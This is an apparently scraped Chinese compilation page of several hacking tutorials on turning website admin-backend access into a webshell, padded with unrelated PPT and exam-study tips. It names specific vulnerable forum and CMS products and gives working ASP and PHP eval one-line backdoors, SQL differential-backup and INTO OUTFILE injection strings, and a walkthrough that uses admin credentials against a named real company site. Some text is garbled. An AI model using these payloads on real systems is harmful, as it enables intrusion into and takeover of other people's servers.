教你从后台得到webshell十大技巧

时间:2022-11-25 01:53:42 作者:不语 综合材料 收藏本文 下载本文

“不语”通过精心收集,向本站投稿了9篇教你从后台得到webshell十大技巧,以下是小编为大家准备的教你从后台得到webshell十大技巧,欢迎大家前来参阅。

篇1:教你从后台得到webshell十大技巧

前 言

动网上传漏洞,相信大家拿下不少肉 ,可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面。

注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。

一、直接上传获得webshell

这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文件url应该是forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。

二、添加修改上传类型

现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell,

LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格!

三、利用后台管理功能写入webshell

上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:网站incIncHtmBoardLink.asp就是我们想要的shell。

四、利用后台管理向配置文件写webshell

利用“”“”:“”//“等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker@263.net”:eval request(chr (35))//, 在配制文件中就是webmail=“cnhacker@263.net”:eval request(chr(35))//“,还有一种方法就是写上 cnhacker@263.net”%><%eval request(chr(35))%><%',这样就会形成前后对应,最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的 客户端来连,需要说明的是数据库插马时候要选前者。再如动易,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马“%><%execute request(”l“)%><%',保 存顶部栏目菜单参数设置成功后,我们就得到马地址网站/admin/rootclass_menu_config.asp。

[

篇2:从后台得到webshell技巧大

前 言

动网上传漏洞,相信大家拿下不少肉 ,可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面。

注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。

一、直接上传获得webshell

这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。

二、添加修改上传类型

现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa|asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格!

三、利用后台管理功能写入webshell

上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:网站incIncHtmBoardLink.asp就是我们想要的shell。

四、利用后台管理向配置文件写webshell

利用”“”“:”“//”等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker at 263 dot net“:eval request(chr (35))//, 在配制文件中就是webmail=”cnhacker at 263 dot net“:eval request(chr(35))//”,还有一种方法就是写上 cnhacker at 263 dot net“%>可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时候要选前者。再如动易2005,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马”%>, 提交后,在数据库操作中压缩数据库,可以成功压缩出.asp文件,用海洋的最小马的eval客户端连就得到一个webshell。

七、asp+mssql系统

这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个本地提交的表单,代码如下:

已上传文件的位置:

要复制到的位置:

另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里,想要备份的WebShell的相对路径填写在“要复制到的位置”那里,提交就得到我们可爱的WebShell了,恢复代码和此类似,修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台,动网的数据库还原和备份是个摆设,不能执行sql命令备份webshell,只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell,一般后台是显示了绝对路径,只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码,利用动网7.0的注入漏洞可以用差异备份一个webshell,可以用利用上面提到的方法,将conn.asp文件备份成.txt文件而获得库名。

差异备份的主要代码:

;declare at a sysname,@s varchar(4000) select @a=db_name,@s=0x626273 backup database @a to disk=@s--

;Drop table [heige];create table [dbo] dot [heige] ([cmd] [image])--

;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--

;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

这段代码中,0x626273是要备份的库名bbs的十六进制,可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:web1.asp的十六进制,也就是你要备份的webshell路径,

当然也可以用比较常见备份方式来获得webshell,唯一的不足就是备份后的文件过大,如果备份数据库中有防下载的的数据表,或者有错误的asp代码,备份出来的webshell就不会成功运行,利用差异备份是成功率比较高的方法,并且极大的减少备份文件的大小。

八、php+mysql系统

后台需要有mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的webshell代码插入mysql在利用SELECT ... INTO OUTFILE语句导出shell。在mysql操作里输入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '路径' 就可以获得了一个的最小马。0x3C3F6576616C28245F504F53545B615D293B3F3E 是我们的十六进制,这种方法对phpmyadmin比较普遍,先利用phpmyadmin的路径泄露漏洞,比较典型的是url/phpmyadmin/libra9xiaoes/select_lang.lib.php。

就可以暴出路径,php环境中比较容易暴出绝对路径:)。提一点的是遇到是mysql在win系统下路径应该这样写d:wwwroota.php。下面的方法是比较常用的一个导出webshell的方法,也可以写个vbs添加系统管理员的脚本导出到启动文件夹,系统重起后就会添加一个管理员帐号

CREATE TABLE a(cmd text NOT NULL)

INSERT INTO a(cmd) VALUES('“)?>')

select cmd from a into outfile '路径/b.php'

DROP TABLE IF EXISTS a

访问b.php就会生成一个的最小马。

如果遇到可以执行php命令就简单多了,典型的代表是BO-BLOG,在后台的php命令框输入以下代码:

$sa = fopen(”./up/saiy.php“,”w“);

fw9xiaote($sa,”“);

fclose($sa);

?>

就会在up目录下生成文件名为saiy.php内容为的最小php木马,

最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码”)?>将会在当前目录生成一个a.php的最小马。

九、phpwind论坛从后台到webshell的三种方式

方式1 模板法

进入后台, 风格模版设置 ,在随便一行写代码,记住,这代码必须顶着左边行写,代码前面不可以有任何字符。

EOT;

eval($a);

p9xiaont <<

而后得到一个shell为网站/bbs/index.php。

方始2 脏话过滤法

进入安全管理 ◇ 不良词语过滤。新增不良词语写 a’]=’aa’;eval($_POST[’a’]);//

替换为那里可以随意写,而后得到一个shell地址为网站/bbs/data/bbscache/wordsfb.php。

方式3 用户等级管理

新建立会员组,头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a’;eval($_POST[’a’]);// ,升级点数依然可以随意写。而后得到一个shell地址为网站/bbs/data/bbscache/level.php。

以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。

十、也可以利用网站访问计数系统记录来获得webshell

最明显的就是某 程序内的阿江计数程序,可以通过网站/stat.asp?style=text&referer= 代码内容&screenwidth=1024直接提交, 即可把代码内容直接插入到计数系统的数据库中,而此系统默认数据库为count#.asa,我们可以通过网站/count%23.asa访问得到webshell,由于阿江计数程序过滤了%和+,将最小马改成 替换代码内容处提交,然后用lake2的eval客户端来提交,值得一提的是如果进到计数后台,可以清理某时某刻的数据,一旦插入asp木马失败,可以清理数据库再次操作。

解决方案

由于本文涉及的代码版本很多,所以不可能提供一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补,若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补,可以到相关 下载最新补丁进行修复更新。同时也请大家能时刻关注各大安全网络发布的最新公告,若自己发现相关漏洞也可及时通知 。

后记

其实,从后台得到webshell的技巧应该还有很多的,关键是要看大家怎么灵活运用、触类旁通,希望本文的方法能起到抛砖引玉的作用。 各位加油吧,让我们将服务器控制到底!

forum.wrsky.com/at......id=121cd&download=1下载doc文档

另注:此文不知道怎么跑到黑防12期署名王开东(大连软件学院)记得当时是netop要出书给他写的稿子!真**地闷,什么无耻的人都有!

篇3:从后台得到webshell的方法

在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外,因此,我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面。

注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。

一、直接上传获得webshell

这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文件url应该是

forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传 webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。

二、添加修改上传类型

现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa asP类型, ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加. aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得 webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格!

三、利用后台管理功能写入webshell

上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有 leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:网站incIncHtmBoardLink.asp就是我们想要的shell。

四、利用后台管理向配置文件写webshell

利用“”“”:“”//“等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker@263.net”:eval request(chr (35))//, 在配制文件中就是webmail=“cnhacker@263.net”:eval request(chr(35))//“,还有一种方法就是写上 cnhacker@263.net”%><%eval request(chr(35))%><%',这样就会形成前后对应,最小马也就运行了,

<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的 客户端来连,需要说明的是数据库插马时候要选前者。再如动易,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马“%><% execute request(”l“)%><%',保存顶部栏目菜单参数设置成功后,我们就得到马地址网站/admin/rootclass_menu_config.asp。

五、利用后台数据库备份及恢复获得webshell

主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其他后缀如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时候,但是有asp系统在运行,利用此方法来查看源代码来获得其数据库的位置,为数据库插马来创造机会,动网论坛就有一个ip地址的数据库,在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法,很多asp程序在即使改了后缀名后也会提示文件非法,通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的,还有一种就是用记事本打开图片文件,随便粘贴一部分复制到asp木马文件头,修改 gif后缀后上传也可以突破检测,然后备份为.asp文件,成功得到webshell。

六、利用数据库压缩功能

可以将数据的防下载失效从而使插入数据库的最小马成功运行,比较典型的就是loveyuki的L-BLOG,在友情添加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操作中压缩数据库,可以成功压缩出.asp文件,用海洋的最小马的eval客户端连就得到一个webshell。

七、asp+mssql系统

这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个本地提交的表单,代码如下:

<form. action=网站/bbs/admin_data.asp?action=RestoreData&act=Restore method=”post“>

<p>已上传文件的位置:<input name=”Dbpath“ type=”text“ size=”80“></p>

<p>要复制到的位置:<input name=”backpath“ type=”text“ size=”80“></p>

<p><input type=”submit“ value=”提交“></p> </form>

另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里,想要备份的WebShell的相对路径填写在“要复制到的位置”那里,提交就得到我们可爱的WebShell了,恢复代码和此类似,修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台,动网的数据库还原和备份是个摆设,不能执行sql命令备份webshell,只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell,一般后台是显示了绝对路径,只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码,利用动网7.0的注入漏洞可以用差异备份一个 webshell,可以用利用上面提到的方法,将conn.asp文件备份成.txt文件而获得库名。

篇4:教你进后台简单拿webshell

今天第二次给菜菜们了!呵呵``````我太NX了`````(开始装B)那次听holy说抓包,我一直没自己作过,今天自己就实践了下,成功了!RP不错!

好了,我们老进后台也没什么意思,我写帖子就写了好几种进后台的方法了,今天给菜菜们做个进了后台,以后通过上传,然后抓包,然后在用明小子综合上传拿shell!

我随便找了个后台,还是以前写帖子找的,这里我给你们用户名和密码吧!

admin appliedtek101.

工具: WSockExpert.exe抓包工具,明小子

打开抓包工具的界面,你会看到什么也没有,然后注意点 左上面那小文件夹图标

,然后出现选择那个iexplore.exe,找到企业后台管理,然后点open,设置如图1

pen以后你将什么也开不到,那就对了,因为你还没上传

找个文章发表的地方,肯定有大家放心,数据库备分肯定没有,那管理员就太```好我找了一个,随便上传了图片,出现如图2,你们如果上传不一定出现啊 ``因为是程序设置的不一样

上传成功```OK!现在我们就去抓包那里看看有没有变化,呵呵``变化是有的```我们应该找到post

我不说了,牵扯到数据包发送,接受还有网络协议等等`````如果你有兴趣自己可以研究下```

POST我们看到底下的内容,POST /upfilea.asp :www.appliedtek.com/uploada.asp,这两个信息是代会我们要上传的地址

这里我大体说下,为什么我们会有两个地址呢,一个uploada和一个upfilea呢!那一个是目录,一个文件,当然用明小子是用的文件了也就是地址!然后就是cookies 复制下来,以后要填写在明小子里

地址:www.appliedtek.com/upfilea.asp

明小子这里有好四个选项,这四个都是大型网站的摸版,上传地址的后缀要跟上面其中一个符合,第一个肯定不行,因为是BBS 所以我们选择第二个,然后设置如

自己选个小马,明小子带的好象不行了

小马的地址就是我在上图标志的那个,用浏览器打开就可以得到如图5的页面,就是上传大马的页面,然后选择大马,把路径就是选择文件保存的绝对路径:D:hostingwwwrootappliedtek_comhtdocsUpload,然后再后面随便写个test.asp 为大马的访问地址!然后上传大马,提示上传成功!

上传后你就得到了shell了,然后输入www.appliedtek.com/Upload/test.asp输入密码进去就可以了!

呵呵```就这么完了```太NX了````

篇5:入侵从后台到webshell一点思路

asp+acc/mssql程序

主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用,具体方法和分析可以参考angel的文章《动网论坛7.0获得WebShell的分析》。据我所知,目前还有很多的asp程序后台存在这样的漏洞,利用方法大同小异。

php+mysql程序

① 利用后台的数据查询功能

在有的程序后台提供直接对mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的webshell代码插入mysql在利用SELECT ... INTO OUTFILE语句导出shell。我们这里用ipb论坛做个演示:

第一步:把我们的webshell代码写入数据库

随便找个可以写入的地方(注意对你输入的要没有进行过滤),这里我们就用后台的新建立个论坛,在论坛描叙里写入我们的shell代码

第二步:导出webshell

我们来到“SQL Management”里的“mySQL Toolbox”在“Run Query”里写入语句:

SELECT * FROM 123forums into OUTFILE 'd:shell.php'

shell代码所在的表,web目录绝对路径,如果主机mysql查询成功,我们就得到我们webshell:

127.0.0.1/test/shell.php?c=dir

② 利用mysql数据备用

思路结合上面的2种情况,有的程序在备用数据库时 对备用文件的类型没有限制,从而导出php文件,我们和①中那样,通过把webshell代码写入数据库中,在利用数据备用导出webshell,我们大家熟悉的vbb论坛就可以用这个方法来得到webshell,我们设置用户的签名为

我们就可以在论坛的根目录下访问我们的shell了,因为可能到处的文件比较大,我们可以换一个可以生成文件的webshell代码。

补充思路

利用web后台系统设置,如果是系统设置是保存在php/asp文件了,我们可以同过在设置里写入webshell代码到保存设置的php/asp文件了.

演示

程序sablog,sablog的基本设置保存在adminsettings.php 由于后台在提交设置的变量十没有过滤,导致我们可以向adminsettings.php写入任意代码。

进入后台--“基本设置”--“blog名称”(其他项也可以)--填入代码:sss”;phpinfo;“ss --提交。

这样我们就把phpinfo()写入了adminsettings.php,我们可以看到adminsettings.php正常显示php的信息。

小结

上面是php等系统的演示,同样也适合asp等其他的系统(比如动力,惊云下载等等)。只是注意在写代码的时候要小心,如果代码有错,可能导致整个web系统的瘫痪。

还有一个是利用上传漏洞的 这个就不要多说了 呵呵:)。

篇6:从后台到webshell的思路总结

1.asp+acc/mssql程序 主要是利用后台对access数据库的备份数据库或恢复数据库功能,备份的数据库路径等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用,

从后台到webshell的思路总结

具体方法和分析可

篇7:从后台到webshell的一点思路Unix系统

主要是利用后台对access 数据库 的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用,具体方法和分析可以参考a

主要是利用后台对aclearcase/” target=“_blank” >ccess数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。具体方法和分析可以参考angel的文章《动网论坛7.0获得WebShell的分析》。据我所知,目前还有很多的asp程序后台存在这样的漏洞,利用方法大同小异。

php+mysql程序

① 利用后台的数据查询功能

在有的程序后台提供直接对mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的webshell代码插入mysql在利用SELECT ... INTO OUTFILE语句导出shell。我们这里用ipb论坛做个演示:

第一步:把我们的webshell代码写入数据库

随便找个可以写入的地方(注意对你输入的要没有进行过滤),这里我们就用后台的新建立个论坛,在论坛描叙里写入我们的shell代码

第二步:导出webshell

我们来到“SQLManagement”里的“mySQLToolbox”在“Run Query”里写入语句:

SELECT * FROM 123forums into OUTFILE 'd:shell.php'

shell代码所在的表,web目录绝对路径,如果主机mysql查询成功,我们就得到我们webshell:

127.0.0.1/test/shell.php?c=dir

② 利用mysql数据备用

思路结合上面的2种情况,有的程序在备用数据库时 对备用文件的类型没有限制,从而导出php文件,我们和①中那样,通过把webshell代码写入数据库中,在利用数据备用导出webshell,我们大家熟悉的vbb论坛就可以用这个方法来得到webshell,我们设置用户的签名为数据库备份,在“在服务器上备份数据库到文件”里改为shell.php,提交保存,

我们就可以在论坛的根目录下访问我们的shell了,因为可能到处的文件比较大,我们可以换一个可以生成文件的webshell代码。

补充思路

利用web后台系统设置,如果是系统设置是保存在php/asp文件了,我们可以同过在设置里写入webshell代码到保存设置的php/asp文件了.

演示

程序sablog,sablog的基本设置保存在adminsettings.php 由于后台在提交设置的变量十没有过滤,导致我们可以向adminsettings.php写入任意代码。

进入后台--“基本设置”--“blog名称”(其他项也可以)--填入代码:sss“;phpinfo;”ss --提交。

这样我们就把phpinfo()写入了adminsettings.php,我们可以看到adminsettings.php正常显示php的信息。

原文转自:www.ltesting.net

篇8:PPT使用技巧:教你从已有PPT文档中提取母板

从已有PPT文档中提取母板

1.用PPT打开已有的PPT文档

2.点击视图→母板→幻灯片母板

3.点击文件→另存为,在“保存类型”中选择“演示文稿设计模版”(文件后缀名为.pot)

篇9:记住这些让高三备考事半功倍,中等生如何提高成绩?教你十大技巧变学霸!

中等生如何提高成绩?教你十大技巧变学霸!

有一部分同学,他们成绩不是顶尖,但是却也不差,这部分同学就是我们所谓的“中等生”……对于中等生来说,最难的就是提高效率。

同样是读一样的学校,一样的老师教,为什么有的同学成了令人羡慕的尖子生?功课遥遥领先,能力高人一等,是他们智商更高吗?

在学习中,只有掌握正确的学习技巧,才能有效地提高学习效率,让学习更上一层楼。

分散式学习、实际测试、记忆卡片……究竟哪个方法对你是最有效的呢?

记住这些让高三备考事半功倍

确立可行目标执行学习计划

进入高三,许多学生孩子喜欢给自己制定很高的目标。但需要注意的是,目标的可行性究竟有多大。对大多数学生来说,制定一个远大但自己又能够相信的目标,并为之不断地努力,对高考的成功都至关重要。

在制定目标时,既不能犯战略性错误,又要讲究战术方针,要让学生一步一个小台阶地走,这样他跳一跳能够得着,也就会产生兴趣,不容易放弃。同时,要根据学生自身的具体情况,设定科学的目标,并对大目标进行分割,每实现一个小目标,都向最终的胜利又迈进了一步。比如,一个高考生现在只能考到200分,却立志进清华,这个目标就太不真实了。哪怕一开始设定的目标较低,经过一次次考试的检验和调整,逐步增加预期,那这个提升的过程就是快乐和有意义的。确立目标之后,就要有计划地去执行,包括提升学习能力和解决学习内容。能力影响的是全学科的成绩,而内容是提高每科成绩的基础。

找出知识漏洞

发现学习乐趣

由于中、高考的考察面很广,高三的学生需要复习的内容特别多。在这种情况下,首先要掌握知识体系,提升对知识的综合运用能力。因此,开学后的一段时间里,考生应进行系统化复习,着重解决有难度的知识点,是学习的主要方向;然后才是用模拟试卷去检验学习的成果,进行知识体系的梳理巩固、查漏补缺,并在自己的薄弱点多下功夫。

不过,很多孩子并不知道自己知识的漏洞到底在哪里,最好的方法是去向每科老师请教,将其意见综合起来。

另外,在高压和枯燥的环境下,想办法提高学习对孩子的吸引力也很重要。比如可以通过与自己比赛的方式培养学习的兴趣和动力。在这种方式中,根据学生的自身特点,选择先从强势学科或者弱势学科入手,通过努力,让他们发现自己跟以前相比做出的突破,起到增强信心的作用。除此以外,将班里成绩比自己好的人设定为竞争对手,或者组建竞争互助小团队,也是不错的办法。

制定错题本

先明白什么是“错题”

错题本是学生在学习过程中,把自己做过的作业、习题、试卷中的错题整理成册,便于找出自己学习中的薄弱环节,进而提高学习效率提高学习成绩。错题本体现了学生的学习问题所在,如果能有效地归纳这个总结,然后并把它解决,非常有利于考生备考。

高三生在制定错题本的时候一定要知道哪些是真正的错题,真正的错题不是因为粗心大意,甚至不是因为计算出的问题的那种错题,是因为你思路出了问题了,或者某个知识点的一个细微之处你没有考虑到出现的,你把它纳入到错题本,起到一个提醒的作用。

对高三的学生而言,错题本是学生高考复习冲刺阶段的最好助手。越往后,这个本子对学生的帮助就越大。因为,每道错题都切中学生的弱点,指出了学习漏洞,是最好的针对个人的学习资料。在这一点上,任何高考专家、辅导书都无法做到。

对比来看,错题本是一个见效慢的学习工具,毕竟错题是需要经历一段时间的积累的,只有有了一定的量,并养成多看多想的习惯,它才能发挥出其效果来。这也是很多学生记着记着就把它抛到一边去的原因。

与考生沟通

家长可借助三种力量

进入高三,家长就真正进入了艰难的陪考历程,对于孩子们,学习固然重要,当然也不能忽视其他方面:比如身体、心理等。家长为了更好地助孩子一臂之力,现阶段首要的任务就是要和班主任、任课老师做好沟通,及时了解孩子在学校的学习,陪同孩子、紧跟高考的脚步。在互联网的社会环境下,学生获取知识的渠道越来越多,学生未来的出路会更多,高考不是实现梦想和追求的唯一路径,家长不要给孩子施加过多压力。

这一年,家长必须建立与孩子良好的沟通渠道,高考不是考生一个人的事,是全家人共同的目标,很多事情需要全家人一起商量一起做决定。不能把这个任务单纯地只交给考生一个人去承担。这就要建立与孩子的沟通渠道。

在高考之年的各个阶段,家长要及时掌握孩子的心理动向,这就需要沟通,各个阶段沟通的内容不一样,高考之年,是一个阶段做一个阶段的事情,不要跨阶段去做,也不要跨阶段去沟通,这样可以减少孩子的压力。

当家长觉得和孩子沟通有障碍,效果不明显的话,可以尝试用借力的方式来达到间接沟通的目的。一是可以借班主任的力,二是可以借孩子好同学、好朋友的力,三是可以借任课老师的力。

教你辞职的技巧

自我时间管理十大技巧

服装销售十大技巧

面试自我介绍十大技巧

个人简历制作十大技巧

从小事得到的启示作文

从蜡烛得到的启示作文

教你说话的九大技巧

高考语文作文十大技巧

面试技巧之十大面试规则

教你从后台得到webshell十大技巧(精选9篇)

欢迎下载DOC格式的教你从后台得到webshell十大技巧,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档